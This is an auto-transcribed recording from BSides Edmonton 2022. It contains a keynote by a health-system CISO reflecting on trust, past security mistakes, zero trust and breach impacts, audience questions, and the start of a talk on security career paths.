BSides Edmonton 2022 Cyber Security Conference

other events is going to be hosted by Sentinel one it's a thread Ops challenge so it's just using their tool to kind of find threats in an environment and that is it so I'll wrap things up and hand it back to Thomas you mentioned something about asking you to get a Wi-Fi password I'm pretty sure there's lots of people here who already have the Wi-Fi password or have a means to get the Wi-Fi password if you know what I mean all right so just uh I don't know where he went where did Robert go is he was sitting right there we're going to introduce our keynote speaker so Robert Martin is the Chief Information Security

Officer of Alberta Health Services and as the CSO Robert is responsible for all aspects of the information and cyber security program for AHS the largest Healthcare delivery organization in Canada AHS provides Health Care to the Empire entire province of Alberta and is fueled by over 120 000 staff Physicians and volunteers he is the co-chair of the AHS Enterprise risk management executive committee and leads the security operations policy governance compliance architecture awareness service manage is there anything you don't do service management teams with a focus on identifying and managing risk uh previously Robert was a trusted advisor and consultant in information security and risk management for a large and public and private sector clients in retail Healthcare energy and government

so with his talk entitled trust stupidity and you please welcome to the B-side stage Robert Martin [Applause]

I got to be uh figure out how to put the microphone in the thing okay good morning everyone thank you Thomas before I get too too carried away I would just want to say that um I'd really like to say thanks to harvinder and Thomas and the entire organizing group for this uh Thomas and I were talking about the uh the wonderful type Community we have in Edmonton here and and you really see this when everybody's coming together and uh shaking hands and hugging each other and I know many many of you uh and I have a very supportive crowd in the front couple rows right no heckling from from the team uh but anyway so thank you very much to

the organizing committee uh it's very nice to be back here uh I'm wondering if I'm getting a bit too much of an echo is that is it bad or good okay just tell me if it gets worse I think we have the the hardest job in the world I think we have probably at this point in time the most important job in the world and I don't think that it just has to be the people that are doing the security operations center or the red team if you're working on a privacy impact assessment or a threat and risk assessment you're doing a security awareness you're doing any of those things that Thomas said that I have

under my team or some of the things that we don't have under my team it's really important to understand how much impact we have on the world if we don't do our job or if we do our job poorly there's massive impacts and I want to relate uh the the massive impacts and and the re the reason that I wanted to talk about trust because I think trust is the most important commodity that we can deal with as Security Professionals if we do things to lose trust or to erode trust then all of the things that we've been trying to do as a society for the last 25 years to empower people to to operate

digitally just go away so like Thomas said the themes I'm going to talk about are trust stupidity and you and I don't want you to form a sentence out of that I don't trust that you're stupid there's nothing like that but really what I want to do is is give you some Reflections on my career over the last 25 or so years and and look at some of the things that uh I see as we we've evolved from an information and cyber security perspective and and really have that uh focus on the trust so back 20 26 years ago 1996 uh a good friend of mine who was still in uh engineering at the University of Alberta was in the uh

Eng 400 class I had graduated three years before him and he said uh you remember that class that you go to it's everybody that's going to get out of engineering and uh back in those days at least it was a a bunch of old white men give you uh uh speeches about the importance of professional accountability and trust and dealing with the public and the dean of the school of time Fred Otto stood in front of the classroom my friends was in and said if you're working with computers whatever working with computers means in 1996 you'll never be a professional engineer in the province of Alberta and half the electrical engineering students stood up and walked away and

all of the computer engineering class stood up and walked away when my friend told me this uh later that evening I was insulted I was three years from University I was one year from getting my professional engineering designation and I of course my stuff is important and and you know why would he say something like that this the guys obviously doesn't understand but when I went through the process of thinking about the difference in the opinion between somebody like uh Dr Otto and what he perceived us doing with computers there wasn't that connection there there wasn't that impact let's give a traditional engineering example you build a bridge rush hour traffic there's 50 cars on

there let's pretend that it's two people per car even though we know in Edmonton is only going to be one person per car but it's 100 people on this bridge the bridge collapses falls into the river a bunch of people die absolutely tragic situation uh there's a a huge impact to the people to the families that are impacted the city's disrupted because there's no Bridge the city has to spend a couple hundred million dollars to build a new bridge it's going to take many many years and somebody like Fred Otto would look at this and go that is why you have engineer because if you screw up that's the kind of impact that you have so park that for a second a couple

years later there was a big Push by Kips some of us would remember Kips the Canadian information processing Society brand maybe anybody oh there we go at least two three people know kips uh back up until probably 2005 Kips was was the thing when it comes to I.T across Canada there was a couple thousand members in the Kipps Edmonton chapter alone and they did a lot of work to get an information security professional designation where they were trying to have the same argument that the engineers or the accountants would have with regards to public impact you met make a mistake you do something wrong from an I.T perspective and there's uh big consequences a good friend of mine was uh leading the

the initiative in in Alberta and he asked me to to sign up and get that designation but I was still struggling to figure out how I was going to be a professional engineer and I didn't want to go down the path of this this other other designation because again I couldn't understand the issue of impact was the thing that I was doing actually going to have the same impact so what those two is sort of background information fast forward to 2017. fast forward to the Russian invasion cyber Invasion and attack on Ukraine if you haven't read the book sandworm by Andy Greenberg I highly suggest that you buy that and read it I highly suggest that you

give that book to people that you're trying to communicate about cyber security issues uh if you know anybody like uh that writes for Wired or at the Atlantic or whatever they can take these complex things and put them in a context that makes uh makes it interesting and and readable so I took this book I read it last uh last fall and then bought a dozen copies and gave it to Executives in our firm and peers and in it and ask them to understand read this to understand the impact that happens if we don't do our job correctly so come full circle from 1996 to 2017 and I think it's obvious now that the things that we do have great impact on

the organization have a great impact on society I think it's important to understand that if we don't do our jobs or if we don't do our jobs well we're going to get into a situation where we're going to be impacting people potentially like the bridge example right maybe the bridge doesn't collapse if we don't do our job but maybe multiple people lose their personal information maybe as an organization has a major breach and loss of shareholder value I know it's not exactly cyber security but what happened two weeks ago with Twitter and the new verified blue check mark process and Eli Lilly right somebody creates an account uh they're verified as Eli Lilly they post a tweet

to say that insulin is now free and Eli Lily's stock price tagged right and it's not a hard stretch from what we do from a compliance perspective from a controls perspective to something like that and understanding that you know the mistakes that we make could have that same sort of consequence there's a lot of other issues of course breaches are something that uh come to mind a few of us were were involved in a breach uh about nine years ago where we didn't actually think uh didn't actually know for sure if the the people's information was compromised but we took uh and do caution we we alerted uh 11 500 people of uh of the issue

in today's standards 11 000 people is nothing right from a breach perspective there's always in the hundreds of thousands of people are now compromised but I think it's really important for us to understand that 11 000 people received a letter and 11 000 people went what does this mean to me right even if it wasn't a mistake that we made even if the we didn't know for sure that there was that breach we took that initiative to make sure that people understood that and in effect trying to do the right thing we still cause those people grief so what happens now if it's a hundred thousand people what happens if it's everybody in the province of Alberta what happens if

it's like what happened in Newfoundland just over a year ago and well I mean officially we still don't know what happened with their health system in Newfoundland but the uh the rumored uh price tag for the recovery from their outage in the health system in Newfoundland is around 40 million dollars right so if we don't do our job correctly not only are we potentially breaching people's health information but we're actually causing a great deal of cost and impact to the organizations that are that we're working for um so I I guess the the point really is if you want to be able to communicate your what you do if you want to be able to understand the

impact that you have I think it's important for us to be able to communicate the potential impact I'm going to get back to this in a little bit when we start talking about some of the the quote unquote stupid things that have happened over the years in my career and and I want to make sure that people uh understand that I'm not pointing fingers at anybody uh In This Crowd I'm actually pointing fingers towards me when I talk about being stupid um but in the last 25 years we've decided to move towards online services we decided to move towards uh you know digital uh personas and digital uh activities and uh the underpinning of all that is the trust that builds from

security so please don't uh please don't uh lose sight of that that's a little bit about trust we're going to come back to that in a few minutes I want to talk about stupidity now and uh and there's a lot of people here from a security perspective I would imagine that some of us are thinking that uh stupidity and then the first thing they think of is starts with the U users right I mean how many times have you said in your career at least I've said in my career that my job would be a whole lot easier if I didn't have to deal with users right um You can say there's a bunch of

problems with users users click the link right while the user maybe uh maybe there's a a problem with a system or a problem with regards to a lack of knowledge and the individual does something that we would think is stupid there's a great cartoon you've probably seen it it's the boxing ring and the microphones hanging down from the ceiling and in the middle of the the boxing ring is the the referee and you're holding the microphone to his hand he said in this corner we have multi-factor authentication and encryption and firewalls and anti-malware software uh and in this corner we have Dave our Dave and if your name is Dave I apologize I'm not picking on Dave's

um I'm not picking on anybody because really Dave is just the average user right Dave clicks on the link in his personal email and it encrypts his work computer that then encrypts to file share and causes a bunch of grief on a system you know maybe Dave didn't understand what Dave was doing maybe Dave's just trying to get his job done and builds a server sticks it under his desk and doesn't understand that he needs to patch that system maybe maybe Dave is responsible for some workflow and is thwarted by security or thwarted by it and says you know what I'm just going to go sign up for 100 bucks a month on my credit card and buy

some some cloud-based service online because I just need to get my job done and we can we can shake our heads and roll our eyes and we can say you know how many times do we have to tell Dave that you can't just do this you gotta you gotta not click the link you gotta not have the server under your under your desk at work that you can't just go off and buy some cloud service the problem with it is that they're just trying to do their job like what what's Dave's job maybe Dave pays vendors Cuts checks for vendors maybe Dave runs a dispatch team to deliver you know gravel to your house maybe Dave

is in customer service uh Dave is not an information in cyber security we are it's our job to do those things it's his job to go do whatever it is his job is and I think it's really important to understand that people are going to do quote unquote stupid things because people make mistakes because we all make mistakes so I don't want to pick on users anymore I want to talk about the things that we do that are stupid and to the point I made earlier I'm going to talk about some of the things from my career that make me kind of shake my head and uh I want us to think about so that we can

learn from that and maybe change the way we do things going forward um so the first thing is uh around the perimeter so for those of you that know me for a lot of years I talked many courses uh 40 courses in about a five-year period largely focused on information and cyber security principles uh there's probably a couple of my former clients in this room as well where I had a a lot of time back in the early 2000s trying to get people to understand how they could use the internet for their uh internet for their business and I had this diagram this Vizio diagram with this wonderful little brick wall in isometric form and you

know that was the firewall and I had a little dotted line that I would draw through the firewall and on the left hand side of the diagram there'd be this like ethernet Network and a couple computers and I'd write trusted and on the left hand right hand side of this dotted line in the firewall there'd be a big bulbous Cloud to represent the internet and I would say untrusted and in 1998 when I first did a diagram like that or even even 2003 or four when I'm teaching those courses I think it's okay to be talking about a trusted and untrusted network but if you really think back on that think of the damage that that does thinking about the

fact that we can actually build an entire network that we trust right that means there's no computers on your network that you don't manage there's no computers that have been compromised on your network there's no insiders that are doing something against you on your network and so it's problematic to think that we actually would have ever created a trusted Network but as a consultant as a as a instructor uh even as a manager I was trying to communicate a very complex and complicated topic and I was trying to get a way for people to understand that it's important to have this firewall but the problem is is that over the years when you sell that story

people then go oh Robert's here he's going to put in a firewall to secure us we all know especially now that there is no such thing as a firewall that's going to secure us it is one of those things that we need but it is absolutely not the only thing that we need and I think it's the Insidious thing here the thing that's really been problematic over the years is that it took a long time for people to understand that we're going to need to buy more controls the first time I went forward and said well now we need to go do this people said well you told me I needed a fireball I thought that was going to be all I

needed to do right so we dumbed down the conversation we got it to the point where we could communicate a very complex and complicated topic into a single icon and an isometric form on a Visio diagram and people thought that was quote unquote all you have to do it took a long time to get over that and it was really not until John kindervag from Forrester came out with the whole concept of zero trust when people now have to understand that it's not that you have a a single device or single control that's going to take care of this for you you actually have to understand that there's nothing on there that you should implicitly Trust

so that's the first thing from my career that I think is is uh causes us should cause us to reflect back on some of the decisions that we've made in the past the second one I want to go into is the uh the Dave cartoon again right he listed all these controls the the referee did talked about encryption and multi-factor authentication and anti-malware he basically talked about defense in depth and I think defense in depth is something that we should not talk about anymore it was one of those Concepts where uh there were some of us that were looking at every layer of the OSI protocol stack and thinking we needed a control at each one of those points we

needed to have a control at every single uh intersection point on our architecture diagrams and what would uh what's the purpose of those controls the purpose is that we need to understand how to protect things my second day at one job I had a physician come up to me uh and he uh he pointed his his finger in my chest and says the problem is if you do your job I can't do my job and I think maybe somewhat to my credit I I replied very quickly I said no if I do my job correctly you don't know I exist and I think that's what we need to do we need to not say that defense and depth

is what we need to do and not need to say here's all the controls that we need to have I need to have overload of controls and have a different firewall on the outside than on the inside and a different malware on our servers than on our desktops because that just causes burden that just causes people to slow down their work it just causes people to bypass us and go around and I'm not saying that we need to get rid of controls although that might very well be the case I think we need to be smarter about the controls that we have and I think defense and depth is one of those things where 15 20 years ago when

we're coming into this industry and trying to figure out how to communicate this we try to find a topic that made sense to people well we need to have coverage of the controls and I think we need to be much more judicious in our control selection now and much more focused on the actual implementation of controls that will do what we need to do the last example that I'll give is around a situation about the same time as uh the dean of engineering made that comment and I was working for a consulting firm we were trying to build uh I was trying to build a burgeoning uh internet practice management at the company uh wasn't sure that the internet was

going to be a thing as this is the flash in the pan or do we should we invest in this and of course I had that sort of like oh a bunch of dinosaurs and you know I they blah blah um looking back at it though I can see now that they never saw the value in the internet there was uh their world was a Mainframe behind a glass wall and data went into the Mainframe and reports came out of the Mainframe and the business ran themselves on the reports that came out of the Mainframe there was a direct connection between the business and the Mainframe and therefore the Mainframe had value and as a consulting firm if we support the

thing that provides the business value we can make money the first job that I did on our burgeoning internet practice was to essentially take well it was probably Word Perfect five one in those days probably wasn't word a document that the department of environment had made and published it on the internet on a bunch of static web pages and management looked at me and said you know is that a business model that is actually going to make sense is somebody going to pay I mean 1996 or whatever it was 75 bucks an hour for a consultant to to copy HTML Pages onto a website there's no value in that but about that same time our Victoria office called and said

yeah I think we might have something might have something that gives us some value so management sent me to Victoria for a couple days and I remember sitting in the boardroom in in Victoria and there was just this screen imagine what a web browser looked like in 1996 and there's an input field and a submit button and on another monitor they show us this database and there's a bunch of dummy data in some Oracle database and uh the guy types into the inbox input field and types in a date range hit submit and the second later all this data wonderfully appears on this screen and uh so I take over the keyboard and I type in a couple different date ranges

and I can see that this is a actual live connection into uh to the database and change the database and rerun the query and and this is wonderful uh and instantly I looked at this and went this is fantastic you know this is how we're going to have value this is a connection between all of our data and the internet this is not just static HTML pages now reflecting back on what we did in that board room in 1996 is we basically invented SQL injection attacks right we basically had the ability for us to put code directly into a query against a against a database and I think we can probably give ourselves a pass again to say we didn't

really think of the problems of of creating SQL injection back at that point in time but I think it's important for us to reflect now and think about the things that we are doing today that could be tomorrow's SQL injection what are the things that we're doing that are that are stupid that that we haven't put in place or have put in place but don't manage properly that could be causing problems what are the things that we do it's like I can't believe we have it rolled out some control to whatever system maybe there's no multi-factor authentication maybe maybe maybe we still have a critical system on a server underneath somebody's desk you know why haven't we

dealt with that what are the things that we know about that we should be fixing that we should be raising up for attention and getting changed but also what are the things that are new technologies that we're enamored with that could be causing us problems what is the the next connecting web browser to a SQL database going to be is it something on the cloud is it something with regards to uh the fact that we all have Smart devices on our phones and apps and ability to carry around lot uh large large amounts of data what is the thing that we're doing right now that you're going to turn back on in the future and go I can't believe we did

that right users will always click the link users will always do the thing to do their job we have to anticipate that that's part of our jobs if we're not anticipating those things we're not doing our jobs but the point is is there's a bunch of things that we do that need to be challenged and this isn't easy I mean I look at this with my team and and my own personal experience and I go what is this and you know what is the thing that we're missing and how do we get time to do those things and the money to fix those things and I really think that one of the lessons that I want to impart is that we

need to explain to people how complex and complicated these things are that we're doing and if you think back to the the firewall with the trusted and untrusted right trying to dumb things down to uh to make a complex and complicated thing simple or if you think about the uh just even the the the the wording around some of the ways that we've deployed controls and and allowing people to think that well Robert's going to install a firewall and we'll be secure allowing that sort of language to happen is actually detrimental to us and I think I'm going to go back to the plug and I think if you haven't already gone got the sand worm book and haven't given it

to all of the people that you uh work for that don't understand what you do and go to Audrey's buy that from your local bookstore thank you very much um I think it's a really good um opportunity for you to find a way to communicate a very complex a very dangerous and impactful thing to to people because if we can do that if we can say without using fear and certainty and doubt that here's a problem and actually show that there are consequences for the decisions that we're making or the decisions that we're not making and show the real world impacts to that we can then help build the trust around our systems we can help

maintain the trust around our systems we're not trying to say the sky is falling we're not trying to say that everything is wonderful we're actually going to communicate that there are major problems here there's major investment required and it's not just you know Robert's firewall that's going to solve the problem it's a multi-disciplinary team it's a multi-uh disciplinary skill set that's required and that's why I said at the start it's not just about the people in the Operation Center it's not just the red team people that I'm talking about here it's everybody that's involved in information and cyber security so I want to challenge you to think about what it is you need to do what it

is you can do better in your world what it is that you're uh maybe potentially uh embarrassed about now that you're doing or not doing what is it that in a in a few years you'll be embarrassed that you oh man I can't believe we actually did that thing and work to find a way to address those issues work to find a way to make those things better because I think the bridge example is important the bridge has a very impactful issue if it falls down and people die as a result there's obviously societal impacts There's issues with regards to the the families there's the capital cost but what we're talking about here isn't just a single

Bridge it could be talking about all the bridges in Alberta it could be about the fact that the bridge is going to collapse because of somebody from outside of Alberta and if you really want to Circle back to that 1996 conversation with the dean of engineering hopefully we can now explain to those people um the old people uh that there actually is impact to what we do and that we actually do have to think about things in a in a much more comprehensive sense I have no idea what time it is all right how much time do I talk Thomas five minutes um so that's good I I um there's no clock here and my phone's in my pocket

I would like to um uh give the time for some questions or some comments uh no heckling from the team please but if anybody has anything to uh ask I would be uh happy to do that um and otherwise I'm going to be around for the morning and so if there's uh questions or people want to talk without having to be in this sort of forum I'd be happy to do so as well but anyways thank you very much uh reflect on the importance of your job whatever your job happens to be in information in cyber security think about the trust and the impact of your job on the trust that people have in our

systems and our institutions uh and then think about all the stupid things that I've done and don't be like me thank you very much [Applause] thank you Robert um are there any questions uh if so please just raise your hand and I'll come walk over with a mic any questions for Robert how's your uh solitaire game going very good thanks for those who don't know can I can I tell this story so Robert is a live streamer Solitaire player yeah I I tried to learn how to do things on Twitch and so the only thing I could figure out that I could play that I could do would be a solitaire because I have no no uh no high twitch reflexes so

it was actually very entertaining questions yeah over here perfect you can just stand up please sort of

see if I get feedback no feedback all right uh okay so Engineers love rules cyber security people love breaking rules how do you strike a balance between the two yeah I mean I think there's uh um there's a bunch of people in information and cyber security roles that love rules and compliance and uh making sure that the things that are done follow policies and procedures and standards so I would think that there's a number of people on my team uh and in related teams that are rule followers versus a bunch of people on my team that are rule Breakers because they're trying to find the ways of making the system uh fail so that we can secure it whereas

the other parts of my team are like here's how you have to do things so that things don't fail uh and I think you're probably never going to have an individual that plays both roles but I think you have to have a team that you have both roles on it right because I think it's really important to understand that um those people need to work together really well because uh we're all doing the same thing we're just doing it from a different perspective thanks for the question that was great anybody else any other questions one more oh yeah we got one right here Robert

good morning can you hear me okay just a quick question if you had any uh Lessons Learned or lessons observed about the Newfoundland Health Care attack maybe specifically about inability to act on um red flags I know they had a 2015 2017 and then 2019 external audits that raised multiple issues none of the issues were fixed and suddenly they had suspected ransomware yeah I mean I I would say that Newfoundland um boy this is a tough question to answer uh Newfoundland uh from their own admission doesn't seem like they knew how to respond to those Audits and it's not that they were uh purposely not doing anything it was just they were paralyzed in doing

something they didn't know where to start uh and uh I would say that the uh they learned the hard way about having to start sooner right um what I do know in my conversations with some of the people from Newfoundland and you know with the federal government uh for the amount of information that the feds can release uh is that the uh the red flags were there and they needed to be acted upon absolutely to your point um I think it was just one of those problems that was just too big to comprehend and they just didn't know where to start and I think uh newfoundland's done a a great job of saying let's not have this happen again

how do we how do we build the infrastructure and the the support processes so that it doesn't happen again um not that we haven't had breaches I mean I talked about one of them um uh as I like to say I know we have a good incident response process because we use it so often but uh you know we have uh I think in Alberta what we've been able to do that they weren't able to do in in Newfoundland is have the critical mass to actually tackle the problems in parallel instead of Serial I think because they were so small they weren't able to say well let's do some policy work and some compliance work and

some you know infrastructure work and some technical controls uh and I think they just uh they just couldn't get going um and so I think that's the uh I'm not sure if that answers the question but I think that's what I can say thanks

um one of the things that I always um you know try to Define our role as is identifying risk and to the organization just like you said so what a good way to you know add on or um complement what you said is to turn that lens on ourselves as a risk to the organizations that we are trying to protect and really like what are we doing and and why yeah that's a that's really great I mean um I wish I would have talked to you before I get my speech because I'd have been a great a great ad so thank you I I think that's exactly what I was trying to say right the the

it's not just the user that causes the problems in our environment it's our own action our inaction sometimes it's our own inability to get things done it's an it's our own uh it's our own desire to to chase the shiny right or the new uh that potentially causes some problems for us so absolutely I think that self-reflection if you want to call it that and and turning that risk view on ourselves to see what we're doing wrong I think is a absolutely what I would uh what I would suggest we all do absolutely yeah thanks this guy over here has got a question not him no good morning Robert definitely a very good talk very

thought-provoking um in terms of uh trust stupidity and use so on the zero trust side of things you mentioned John kinderwagen and the philosophy of zero trust so in your opinion is zero trust you know trust but verify how do you how do you build that philosophy in an organization or you know even from an infrastructure perspective or a process perspective that we um you know we ingrain it in the in the psyche of people or or even even the industry and and you know move that needle forward in terms of you know I'll trust you but I'll verify you know what your identity is or whatnot right yeah so great great question so I think

there's two things I would say so first of all once somebody or wants some business area goes through an issue uh breach they're much more receptive to understanding the trust but verify so you have to be very opportunistic when there's a problem even if it's a small problem uh you know start having the conversation about well this is why we do these things this is why we have these controls this is why I said we needed this thing that you said we don't have the money for I think that's that's the first thing never let a good crisis go to waste the second thing I would say though is in an organization especially in healthcare to say that we don't trust

our people is a very dangerous conversation and a very problematic conversation to be having with with the various groups and not even talking about the unions I'm just talking about human resources uh and and so I think it's more important to focus on the devices right yeah sure you know Dave's a great person but Dave's device do we trust Dave's device to be on our Network well no no no well of course let's discuss have that conversation I think that's the the way that we're we're getting some success if we talk about zero trust at work people go oh well that's you know what does that mean and you talk to the vendors and all the vendors have a

different implementation of what zero trust means but if you go and say let's make sure that we know what's on our Network uh and uh we're finding that nobody's really arguing about that you know that whole concept of the fact that it's not a trusted Network and that we're allowing people on our Network uh people then are fairly quick to make the jump to the fact that we need to make sure that those devices aren't causing us problems and so we don't say zero trust uh because it's a it's a very emotional phrase if you will but we talk about the fact that we have to know what's on our Network and if we can have that

conversation if we can start getting into you know certificates for all of our devices and and uh partitioning off to different networks for the the non-ahs devices then then we're building zero trust without having to say the words right but I I really uh and maybe it's different in your industry but to say to to the executives that you don't trust your people is is a great way to get ignored absolutely awesome any other questions we do have time for one more oh yeah oh said Adam again oh no it's the two for one special uh lots of Industries have gone through various stages of legislation for Safety and Security um OHS industrial safeties example

where do you see us over the next decade going from the beginning of some of the mandatory rules to a much more strict structured maybe legislation mandatory policies you have to do that before we would have said oh well I have a multi-factor except for half of my users but I can check it off to I have to do it or our company can't operate legally there's two things I would say so first of all uh you can typically take a look at what happens in the states and then add 15 years onto that and say that's probably going to happen in Canada where from that sort of Industry uh imposed uh regulations the the Americans do a much

better job with that than than we do in Canada uh which is which is funny seeing how disjointed their privacy legislation is right but their legislation or the regulation around device security or health information uh tying that to economics and and getting paid is is a very effective model um I was in uh Canada Health info weight conference and one of the conversations we had was with the uh Office of the national coordinator for Health and Human Services uh and talking about that exact issue how do you get that level of Regulation that they have in the states up here in Canada to actually Define things um I don't think we're gonna see uh comprehensive legislation to do that

across the uh you know across Canada but in the info meeting last week we're starting to talk about what are the minimum requirements you know how do you enforce the uh ISO standards and the cyber security framework uh how do you build those controls in an agreement so that people actually are forced to comply with these things so there's a level of trust um I I really uh I really wish we could have that sort of national regulation here I don't I don't foresee it happening uh at least not in the next uh several years but uh like I said in a lot of these cases if you follow what the Americans do 15 years

later we sort of do that in Canada and I think there's some opportunity and some conversations happening right now um and honestly back to the Newfoundland thing Newfoundland is driving a lot of that because there is a certain amount of interconnectivity and interdependence on those things uh what happened in Newfoundland impacted Prince Edward Island and Nova Scotia New Brunswick because of patient maneuvering and so maybe there's a Reliance or a requirement to have those uh extra uh regular regulations uh but again um it's going to be a while before we get that unfortunately awesome thank you Robert great great questions um another round of applause please [Applause] are you all here all day Robert for

people to chat with you are you here all day yeah so yeah so please uh feel free to connect with Robert um we're we're right on time so we might as well just head right into the next talk um so our next speaker is Dr Vincent Chu Dr Chu is a founder and past president of ISC squared Alberta his company access cognisolve is an ISC squared official training provider and Vincent is an ISC squared official trainer he enjoys empowering students new immigrants career Changers career advancement and those who are interested in fast tracking their security careers by providing boot camps courses workshops and sharing career advice and presentations so with his talk entitled the right security career for me is dot

dot dot please welcome to the B-side stage Dr Vincent Chu oh welcome [Applause] so I'm hoping you guys can hear me and so this this presentation is very passionate to me uh very personal uh yes we do uh um the reason I want to give this topic because I have a lot of requests to give talk to students uh new immigrants the last 25 years okay and people who want to change careers and so on so I have to tell them some of the reality of it right when I teach computer hacking courses and people will think that wow this is really great I'm going to get paid a lot I say no you're gonna get paid when you write the

report okay not all the things that you hacked okay and they said what do you mean I have to write I say yes right how many unless there are area there are companies that you go to or Services industry that you um actually do the work and somebody else will write it okay but in reality you want to make the big Buffs at thirty thousand dollars in engagement yes you have to write that report right so I want to let you know I'm not here to this is not quick uh Gary's uh scheme I would like to know in general why do you guys do security like is it because the money if you have all the money in the world

what actually do you want to do like why are you doing this thing anybody want to volunteer tell me why are you guys doing this job beside money yes you're different that's good I like that right yeah I contribute giving back and all that stuff to uh that's what I do it because to give back to the community if you look at my career everything I do is to give back to the public right so the last six to eight years I spend time working I went through all the critical infrastructure sectors and I work in them so that I truly understand what's the need how they are interdependent how they're supposed to be harmonized right

so what else what do you guys want to know like I mean um in terms of security career like what do you guys want I'll give you some examples okay I have veteran who come to me Vincent I just finished I just finished my service okay but I still want to give back to the community right I'm an ex military I do a C4 whatever what can I do so those are the kind of people that help right and I've knew immigrants who come here and say this is my background what can I do right I have people who in philosophy or uh you know and uh psychology asked me what can I do I say do you know that the last couple

of companies I went to all the AI departments or whatever they're all PhD in Psychology right they are not computer scientists I'm not saying there's no computer science there they do but most of them because you need to it's not so much just writing a machine learning algorithm but you need to know okay where do you draw the line in terms of Ethics where do you draw the lines in terms of biases right so so I have to show them you know um depending on your background what kind of job they are right I have a lot of people who are like I tell you honestly there's uh this law enforcement on your website they say you

know if you're over 50 you can you know do apply but when I see them at the career fair you tell them you're over 50 they say don't apply right so that kind of contradict their website obviously they will not put it in writing okay so uh so I like to tell people the reality of what's going on out there um yeah so I have a lot of those kind of um thing that's what I want to ask you like I have people who are um you know like new immigrant who comes here and they would like to uh you know they don't have a piece of paper the Canadian paper the Canadian experience so they they will take a course sure

they can go learn this stuff and then they learn uh the technical so they get then I ask them do you really want to set uh configure firewall like every day and say no Vincent I don't want to do that right so then I had to guide them maybe to uh depending on what they want to do right whether they don't do business analytics uh business analyst or project manager There's an opportunity that you go to most company they will have a project manager that specializes in security why I don't see anyone talk about that as a career right so then I have like these days data analytics is a big thing I have a lot of

students come to me you know Vincent I hear a lot about security but my major is in business analytics how do I apply that to security right is there a job for me I say yeah we do analytics all the time right I'm sure most of you can can tell me you know you guys do analyze data all right yes or no and I just love giggle okay see uh so I told him there's a lot of opportunities um depending on your background like some people think like computer science how many of you are computer scientists here okay a few of you it's good like if you look at the history right if you look at

history of things like uh syntax grammar binary tree just from the linguists they are from My Philosophy they are not from computer science right if you trace it back we have a lot of cross-discipline here right so no no one knows the specific domain owns everything right we have to work together okay um and anything else like anything you guys are interested in terms of jobs are whatever interests you any question at all then I just keep telling stories then uh so I'll tell you at the end what was mine uh you know what I wanted to be when I grew up when I grew up right now okay I'll tell you at the end um

so I mean one one of the fun stuff is uh like I said as a career how many of you are employee insecurity right okay how many of your contractors how many of you are a consultant just different okay good how many of you are business owner you run a security business how many of you are partners how many of you are invested how many are Venture of philanthropists see there's a lot more okay there's a lot of career that you can do right you have to I'm not going to tell you where to go find because that's not my job I'd rather teach you how to fish I'm not going to give you the fish okay

if you know what I'm talking about so one really I like to uh like Adventure capitalists want to invest in security technology so if you work with them that's really nice because they got lots of money right wherever they fly you to they give they send a limo for you and you go there and then you check out all the technology around the place and then you can decide well yeah only you tell them you advise them right so those those kind of jobs are really nice really good and some of some of my friends who tell me I want to travel I like to show off stuff then I say yeah you can become

sales you can become application I do know there's some challenges there's there's not an easy life you know to go travel but they are version of traveling that is nice too right I have people who don't want to say I just like to build stuff have you considered working like University needs uh University Alberta even Calgary there's lots of opportunities for you to set up legs right and you can keep setting out all this environment and there's no harm right it's not like you go to work and you set up a lab environment and then you crash and burn there's consequences right but when you do in the lab in the education environment is very different

so there's a lot of jobs out there you have to go look you have to go find out where what you want to do another thing I told them that there's a lot of interpretation jobs out there right now but the name they don't have the name security inside right you got sort of itot everyone no yeah I see something goes up so that's basically uh ID security and the other side of security whatever that is right so we need someone to do the translation okay I have a lot of people who work out in the field whether they are instrumentation journeyman electrician uh you would have thought like and how many of you were afford Mike Murray

right is it very dusty in the summer time or very cold in the winter time there's no in between right so if you ever that's what they all want to come into come into the into the into the office so I told them you can take one of those jobs right if you want accountability become a PM if you want to an easy life come eight to five become a business analyst so our title which side to go which department to go the kind of Lifestyle you're gonna get uh then they come into into the office and most of them are really enjoying it okay and it's you guys in this side I mean if you you want you can grab me

later on we can discuss this so that's what give me gratification right I came in yesterday my student filled me up let's go they buy me lunch or they buy me supper that's where I see the wind right I mean I cannot save the world right but at least I can you know encourage one student at a time right uh that's what that's what gave me satisfaction uh so so that's that's a lot of opportunity right so um that translation world is really nice because especially when you have an expert in another domain right doesn't matter whether mathematics engineering even uh signs any signs right or philosophy Kinesiology and all that you can actually take that and then

translate security into that domain right or whatever industry you're in right how many of you know what are the security required for agriculture I'm pretty sure with some agrologists in here maybe maybe not right some of you may have worked in transportation we have health right we have Canada has 10 critical infrastructure sectors I'm pretty sure we work in one of them right so help help the I.T help do that translation nothing worse than having an I.T person or security person sometimes security person is not a domain expert they know security right I have all the locks in my briefcase but I don't know which one to use right for your specific contacts so there's a lot of opportunity you have

to know where to look for so you can find the job that you want right so I don't want to go talk to money because money is different right so depending to like uh consultant contract things most people who Do Contracting Consulting they don't want to go back to full time because when you see the money is hard to go back right so I told them what do you want you want to balance your life balance right so I took the opportunity to do contract Consulting the same payment as a full-time employee but I have more time now to spend to travel right so depending on what you want to do with your life uh you can do that

and even project management I have people who don't want to do software security but they just want to control I'm not saying that control freak but they like to take they like to go and be in charge so I said want to become a project manager right he said that's not a bad idea right so I want to make sure everyone do the right thing right instead of the technical stuff every little thing so you can just oversee right and then some of them they told me Vincent I I really want to become a security um I want to become a pen tester how many of you are fantastic raise your hand a little bit

so how many actually do pen tests that you did in school where Everything You Touch off there's a holes in almost everything you touch and you can hack almost everything no when you go to the real world everything is fully packed right almost fully patched so you're not going to see that kind of stuff from my experience most of my pen tester after one or two years they get really sick because they don't really do pet testing they just schedule all the scans right and there's nothing cold there's no holes there right so I told them you know unless you want to become on the red team or you're going to become one of those uh you

might you have to join a Consulting team you don't join a owner operator company right I don't know where they teach this kind of stuff I don't see it over 30 years no one tells me I have to suffer through all join all the wrong job to learn all this stuff so now I help my student I help the new immigrants right I help people who want to change career people who have physical limitation I teach everyone I have students who are you know drugs just recovery uh just recovery from spousal abuse and all that you know they want they like security so try to help them transition into a better life so that's one of those things right so

hopefully and I thought first of all they just say oh look that's a big company let me apply there's another big company let me apply for a job there I say first of all do you know all those companies you talk about they're all outsourced right so who do you think is working on that side probably a project manager or a car manager of course the job is outsourced to someone else so you if you want to do the technical you have to find the service provider not the owner operator right so they could look I said you know those big companies even they have 10 15 20 000 people maybe just like maybe only

